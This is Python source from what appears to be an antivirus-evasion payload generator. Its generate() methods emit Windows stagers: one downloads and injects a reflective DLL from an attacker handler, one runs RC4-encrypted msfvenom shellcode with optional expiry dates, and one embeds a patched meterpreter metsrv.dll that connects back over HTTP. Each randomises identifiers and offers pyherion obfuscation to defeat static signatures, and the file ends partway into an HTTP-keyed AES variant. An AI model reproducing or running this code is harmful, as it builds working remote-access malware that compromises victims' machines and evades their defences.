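    def generate(self):
        """Build a Python stager that downloads a reflective DLL over HTTPS and injects it.

        The emitted script (Python 2: ``urllib2``/``httplib``/``xrange``) connects
        to LHOST:LPORT with ``httplib.HTTPSConnection``, GETs a random four-character
        URI whose 8-bit checksum is 92, and hands any HTTP 200 body to a
        VirtualAlloc / RtlMoveMemory / CreateThread injector.  Every identifier
        in the script is randomized so two builds do not share a static signature.

        Returns:
            The generated stager source as a string, run through
            ``encryption.pyherion`` when ``use_pyherion`` is "y".

        Raises:
            ValueError: if LHOST is empty or contains a quote, backslash or line
                break (which would corrupt the string literal it is spliced
                into), or if LPORT is not an integer in 1..65535.
        """
        # Validate the handler options before baking them into source code.  LHOST
        # is spliced into a double-quoted literal and LPORT into a bare call
        # argument below; a bad value would otherwise yield a stager that fails
        # to parse (or parses into something other than intended) only when it
        # runs on the target.  Failing here is clearer.
        lhost = str(self.required_options["LHOST"][0])
        if not lhost or any(ch in lhost for ch in '"\\\r\n'):
            raise ValueError("LHOST must be a plain hostname or IP address: %r" % lhost)
        lport = int(self.required_options["LPORT"][0])
        if not 1 <= lport <= 65535:
            raise ValueError("LPORT must be between 1 and 65535: %r" % lport)

        payloadCode = "import urllib2, string, random, struct, ctypes, httplib, time\n"

        # randomize everything, yo'
        sumMethodName = helpers.randomString()
        checkinMethodName = helpers.randomString()

        randLettersName = helpers.randomString()
        randLetterSubName = helpers.randomString()
        randBaseName = helpers.randomString()

        downloadMethodName = helpers.randomString()
        hostName = helpers.randomString()
        portName = helpers.randomString()
        requestName = helpers.randomString()
        responseName = helpers.randomString()

        injectMethodName = helpers.randomString()
        dataName = helpers.randomString()
        byteArrayName = helpers.randomString()
        ptrName = helpers.randomString()
        bufName = helpers.randomString()
        handleName = helpers.randomString()
        data2Name = helpers.randomString()

        # helper method that returns the sum of all ord values in a string % 0x100
        payloadCode += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" %(sumMethodName)

        # method that generates a new checkin URI for the meterpreter handler: up to
        # 64 random 3-char bases, each tried with every alphanumeric 4th char, until
        # the 8-bit checksum is 92.  (If no attempt hits, the emitted function falls
        # off the end and returns None, which would break the GET below; with 62
        # candidates per base across 64 bases that is a negligible probability.)
        payloadCode += "def %s():\n\tfor x in xrange(64):\n" %(checkinMethodName)
        payloadCode += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" %(randBaseName)
        payloadCode += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" %(randLettersName)
        payloadCode += "\t\tfor %s in %s:\n" %(randLetterSubName, randLettersName)
        payloadCode += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" %(sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)

        # method that connects to a host/port over https and downloads the hosted data.
        # NOTE(review): Python 2's httplib.HTTPSConnection historically performed no
        # server-certificate verification, and nothing checks the response body --
        # whatever comes back with status 200 is handed straight to the injector.
        payloadCode += "def %s(%s,%s):\n" %(downloadMethodName, hostName, portName)
        payloadCode += "\t%s = httplib.HTTPSConnection(%s, %s)\n" %(requestName, hostName, portName)
        payloadCode += "\t%s.request(\"GET\", \"/\" + %s() )\n" %(requestName, checkinMethodName)
        payloadCode += "\t%s = %s.getresponse()\n" %(responseName, requestName)
        payloadCode += "\tif %s.status == 200: return %s.read()\n" %(responseName, responseName)
        payloadCode += "\telse: return \"\"\n"

        # method to inject a reflective .dll into memory: VirtualAlloc(0x3000 =
        # MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE), copy the bytes in,
        # CreateThread at the buffer, wait forever.
        # NOTE(review): the returned pointer is passed around through ctypes.c_int,
        # which is 32 bits; this is only correct under a 32-bit Python interpreter.
        payloadCode += "def %s(%s):\n" %(injectMethodName, dataName)
        payloadCode += "\tif %s != \"\":\n" %(dataName)
        payloadCode += "\t\t%s = bytearray(%s)\n" %(byteArrayName, dataName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)), ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" %(ptrName, byteArrayName)
        payloadCode += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" %(bufName, byteArrayName, byteArrayName)
        payloadCode += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s),%s, ctypes.c_int(len(%s)))\n" %(ptrName, bufName, byteArrayName)
        payloadCode += "\t\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" %(handleName, ptrName)
        payloadCode += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" %(handleName)

        # download the meterpreter .dll and inject it (validated host/port from above)
        payloadCode += "%s = ''\n" %(data2Name)
        payloadCode += "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, lhost, lport)
        payloadCode += "%s(%s)\n" %(injectMethodName, data2Name)

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode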
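    def generate(self):
        """Build a Python payload that RC4-decrypts msfvenom shellcode and runs it.

        Two options shape the emitted script (Python 2: ``str.decode('string_escape')``):

        * ``inject_method`` -- "virtual" emits a VirtualAlloc / RtlMoveMemory /
          CreateThread injector via ``import ctypes``; anything else emits a
          ``create_string_buffer`` + ``CFUNCTYPE`` cast-and-call via
          ``from ctypes import *``.
        * ``expire_payload`` -- "x" means no expiry; otherwise it is a number of
          days from today, and the emitted script only decrypts and runs while
          ``datetime.now()`` is before midnight of that date.

        The shellcode is encrypted with ``encryption.encryptARC`` and the key is
        embedded next to the ciphertext, so this is obfuscation against static
        signatures, not confidentiality.  The four option combinations produce
        the same text as the earlier four copy-pasted branches.

        Returns:
            The generated payload source, run through ``encryption.pyherion``
            when ``use_pyherion`` is "y".

        Raises:
            ValueError: if ``expire_payload`` is neither "x" nor an integer.
        """
        use_virtual = self.required_options["inject_method"][0].lower() == "virtual"
        expire_option = self.required_options["expire_payload"][0]
        expires = expire_option.lower() != "x"

        # Resolve the expiry date first so a bad option fails before msfvenom runs.
        if expires:
            todaysdate = date.today()
            # str(date) is YYYY-MM-DD; the emitted strptime uses %y, so drop the century.
            expiredate = str(todaysdate + timedelta(days=int(expire_option)))[2:]

        # Generate Shellcode Using msfvenom
        Shellcode = self.shellcode.generate()

        # Randomized identifiers for the emitted script (only those it uses).
        ShellcodeVariableName = helpers.randomString()
        RandIV = helpers.randomString()
        RandARCKey = helpers.randomString()
        RandARCPayload = helpers.randomString()
        RandEncShellCodePayload = helpers.randomString()
        if use_virtual:
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
        else:
            RandShellcode = helpers.randomString()
            RandMemoryShell = helpers.randomString()
        if expires:
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()

        # encrypt the shellcode and get our randomized key/iv
        (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)

        # Imports of the emitted script.
        PayloadCode = 'from Crypto.Cipher import ARC4\n'
        if use_virtual:
            PayloadCode += 'import ctypes\n'
        else:
            PayloadCode += 'from ctypes import *\n'

        # Optional expiry guard; when present the whole body is indented under it.
        pad = ''
        if expires:
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            pad = '\t'

        # Decrypt the embedded shellcode.  RandIV is emitted for parity with the
        # original generator, but ARC4 takes no IV and the script never reads it.
        body = [
            RandIV + ' = \'' + iv + '\'',
            RandARCKey + ' = \'' + ARCKey + '\'',
            RandARCPayload + ' = ARC4.new(' + RandARCKey + ')',
            RandEncShellCodePayload + ' = \'' + EncShellCode.encode("string_escape") + '\'',
        ]
        decrypt_expr = RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')'

        if use_virtual:
            # VirtualAlloc(0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
            # copy, CreateThread, wait forever.
            # NOTE(review): the pointer travels through ctypes.c_int (32 bits); this is
            # only correct under a 32-bit Python interpreter.
            body += [
                ShellcodeVariableName + ' = bytearray(' + decrypt_expr + ')',
                RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ ShellcodeVariableName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))',
                RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')',
                'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))',
                RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))',
                'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))',
            ]
            tail = '\n'  # the VirtualAlloc variant ends with a newline
        else:
            # Cast a string buffer to a function pointer and call it directly.
            body += [
                ShellcodeVariableName + ' = ' + decrypt_expr,
                RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))',
                RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))',
                RandShellcode + '()',
            ]
            tail = ''  # the cast variant ends without one

        PayloadCode += '\n'.join(pad + line for line in body) + tail

        if self.required_options["use_pyherion"][0].lower() == "y":
            PayloadCode = encryption.pyherion(PayloadCode)

        return PayloadCode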
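    def generate(self):
        """Build a Python stager that carries a patched metsrv.dll and runs it in-process.

        The DLL is read from ``settings.METASPLOIT_PATH`` (``metsrv.x86.dll`` when
        present, else ``metsrv.dll``) and patched in place: a bootstrap stub over
        the PE header, the user-agent, the transport switched from SSL to HTTP,
        the handler URL, and the expiration / communication timeouts.  It is then
        deflated + base64-encoded into the emitted script, which inflates it and
        either casts it to a function pointer (``inject_method`` == "void") or
        copies it into a VirtualAlloc'd RWX buffer and starts a thread on it.

        Security notes: the transport is patched to plain HTTP and the handler URL
        is ``http://``, so the meterpreter session is not encrypted in transit.
        The emitted source is Python 2.

        Returns:
            The generated stager source, run through ``encryption.pyherion`` when
            ``use_pyherion`` is "y".

        Raises:
            IOError: if the chosen metsrv DLL cannot be opened.
            ValueError: if the DLL lacks one of the placeholder markers this
                patcher expects (a metsrv build it was not written for), or the
                handler URL does not fit in the DLL's URL placeholder.
        """
        if os.path.exists(settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.x86.dll"
        else:
            metsrvPath = settings.METASPLOIT_PATH + "/data/meterpreter/metsrv.dll"

        # Read the DLL as bytes; the handle is released even if patching fails.
        with open(metsrvPath, "rb") as f:
            meterpreterDll = f.read()

        # Overwrite len(s) bytes at offset ind; the DLL length never changes.
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

        def findMarker(dll, marker, what):
            # Locate a placeholder metsrv ships with, naming it on failure instead
            # of leaking a bare ValueError("substring not found") from .index().
            try:
                return dll.index(marker)
            except ValueError:
                raise ValueError(
                    "metsrv DLL at %s has no %s placeholder; this patcher may not "
                    "match this Metasploit version" % (metsrvPath, what)
                )

        # patch the metsrv.dll header: the first 48 bytes become a small code stub
        # that still starts with the "MZ" magic, so the blob can be executed from
        # offset 0.  NOTE(review): presumably this bootstraps into the DLL's
        # reflective loader -- confirm against the Metasploit source the bytes were
        # copied from, and keep them in sync with the metsrv build in use.
        headerPatch = "\x4d\x5a\xe8\x00\x00\x00\x00\x5b\x52\x45\x55\x89\xe5\x81\xc3\x57"
        headerPatch += "\x87\x05\x00\xff\xd3\x89\xc3\x57\x68\x04\x00\x00\x00\x50\xff\xd0"
        headerPatch += "\x68\xe0\x1d\x2a\x0a\x68\x05\x00\x00\x00\x50\xff\xd3\x00\x00\x00"
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string.  NOTE(review): the replacement is
        # longer than the 15-byte marker, so this relies on metsrv reserving a larger
        # buffer after it -- verify against the metsrv source before changing the UA.
        userAgentIndex = findMarker(meterpreterDll, "METERPRETER_UA\x00", "user-agent")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

        # turn off SSL: the transport placeholder becomes HTTP, matching the
        # http:// handler URL patched in below
        sslIndex = findMarker(meterpreterDll, "METERPRETER_TRANSPORT_SSL", "transport")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler.  The placeholder is "https://" plus
        # 256 'X' bytes; the replacement is NUL-terminated, so the X's left after it
        # are ignored as long as the DLL reads the field as a C string.
        urlMarker = "https://" + ("X" * 256)
        urlIndex = findMarker(meterpreterDll, urlMarker, "handler URL")
        urlString = (
            "http://"
            + self.required_options["LHOST"][0]
            + ":"
            + str(self.required_options["LPORT"][0])
            + "/"
            + self.genHTTPChecksum()
            + "_"
            + helpers.randomString(16)
            + "/\x00"
        )
        # dllReplace overwrites len(urlString) bytes; anything longer than the
        # placeholder would clobber whatever follows it in the DLL.
        if len(urlString) > len(urlMarker):
            raise ValueError(
                "handler URL is too long for metsrv's %d-byte URL placeholder: %r"
                % (len(urlMarker), urlString)
            )
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration timeout placeholder (0xB64BE661) with 604800 seconds (7 days)
        expirationTimeoutIndex = findMarker(meterpreterDll, struct.pack("<I", 0xB64BE661), "expiration timeout")
        expirationTimeout = struct.pack("<I", 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

        # replace the communication timeout placeholder (0xAF79257F) with 300 seconds
        communicationTimeoutIndex = findMarker(meterpreterDll, struct.pack("<I", 0xAF79257F), "communication timeout")
        communicationTimeout = struct.pack("<I", 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

        # compress/base64 encode the dll (the emitted script b64-decodes and
        # zlib-inflates it with wbits=-15, i.e. raw deflate)
        compressedDll = helpers.deflate(meterpreterDll)

        useVoidCast = self.required_options["inject_method"][0].lower() == "void"

        # imports of the emitted script differ between the two injection styles
        if useVoidCast:
            payloadCode = "from ctypes import *\nimport base64,zlib\n"
        else:
            payloadCode = "import ctypes,base64,zlib\n"

        # inflate function, shared by both styles
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randInflateVarName = helpers.randomString()
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + "):\n"
        payloadCode += "\t" + randInflateVarName + " = base64.b64decode( " + randb64stringName + " )\n"
        payloadCode += "\treturn zlib.decompress( " + randInflateVarName + " , -15)\n"

        randVarName = helpers.randomString()

        if useVoidCast:
            # traditional void pointer injection: cast the inflated string to a
            # function pointer and call it
            randFuncName = helpers.randomString()

            payloadCode += randVarName + " = " + randInflateFuncName + '("' + compressedDll + '")\n'
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName + "()\n"

        else:
            # VirtualAlloc() injection: 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
            # PAGE_EXECUTE_READWRITE; copy, CreateThread, wait forever.
            # NOTE(review): the pointer travels through ctypes.c_int (32 bits); this
            # is only correct under a 32-bit Python interpreter.
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + '("' + compressedDll + '"))\n'
            payloadCode += (
                randPtr
                + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                + randVarName
                + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
            )
            payloadCode += randBuf + " = (ctypes.c_char * len(" + randVarName + ")).from_buffer(" + randVarName + ")\n"
            payloadCode += (
                "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                + randPtr
                + "),"
                + randBuf
                + ",ctypes.c_int(len("
                + randVarName
                + ")))\n"
            )
            payloadCode += (
                randHt
                + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                + randPtr
                + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
            )
            payloadCode += "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + randHt + "),ctypes.c_int(-1))\n"

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode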
    def generate(self):
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                randctypes = helpers.randomString()

                # Create Payload code
                PayloadCode = ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += 'import ctypes as ' + randctypes + '\n'
                PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                # Create Payload code
                PayloadCode = 'import ctypes as ' + randctypes + '\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                HeapVar = helpers.randomString()
                randctypes = helpers.randomString()

                # Create Payload code
                PayloadCode = 'import ctypes as ' + randctypes + '\n'
                PayloadCode += ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
                PayloadCode += RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                HeapVar = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                randctypes = helpers.randomString()

                # Create Payload code
                PayloadCode = 'import ctypes as ' + randctypes + '\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + ShellcodeVariableName +' = bytearray(\'' + Shellcode + '\')\n'
                PayloadCode += '\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (' + randctypes + '.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + RandPtr + '),' + RandBuf + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + RandPtr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
                PayloadCode += '\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + RandHt + '),' + randctypes + '.c_int(-1))\n'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += RandReverseShell + ' = \"' + Shellcode + '\"\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate(self.required_options)

                # Generate Random Variable Names
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandReverseShell + ' = \"' + Shellcode + '\"\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + RandReverseShell + ', len(' + RandReverseShell + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["USE_PYHERION"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        """Build the payload's Python source and return it as a string.

        Selects a branch on INJECT_METHOD ("virtual", "heap", anything else)
        and, in the last branch, on EXPIRE_PAYLOAD == "x". Every branch has
        the same side effect: it writes a decoy HTML page to
        HTML_FILE_PATH + <last path segment of TARGET_SERVER>, hands that page
        together with the msfvenom shellcode to
        encryption.encryptAES_http_request(), and then concatenates the output
        source from string fragments. When USE_PYHERION is "y" the finished
        source is passed through encryption.pyherion() before being returned.

        Notes for reviewers and analysts:
        - The generated source targets Python 2 only (urllib2, md5.new(),
          ``except URLError, e:``) and polls TARGET_SERVER over plain HTTP in
          an endless loop, sleeping SLEEP_TIME seconds on URLError. SLEEP_TIME
          is spliced in verbatim, without numeric validation.
        - Only the "virtual" branch derives the cipher key at run time from
          the fetched page; the other two branches embed ``secret`` as a
          literal in the output, so the key is recoverable from the sample.
        - No option value is validated here, the decoy file handle is not
          protected by with/try, and when INJECT_METHOD is neither "virtual"
          nor "heap" and EXPIRE_PAYLOAD != "x" the method falls off the end
          and returns None.

        Returns:
            str: the generated source, or None in the uncovered option
            combination described above.
        """
        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
                target_html_file = str(TARGET_SERVER.split('/')[-1])


                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()

                # Define Random Variable Names for HTTP functions
                RandResponse = helpers.randomString()
                RandHttpKey = helpers.randomString()
                RandMD5 = helpers.randomString()
                RandKeyServer = helpers.randomString()
                RandSleep = helpers.randomString()  # assigned but never used in this branch

                # Define Random Variable Names for HTML Functions
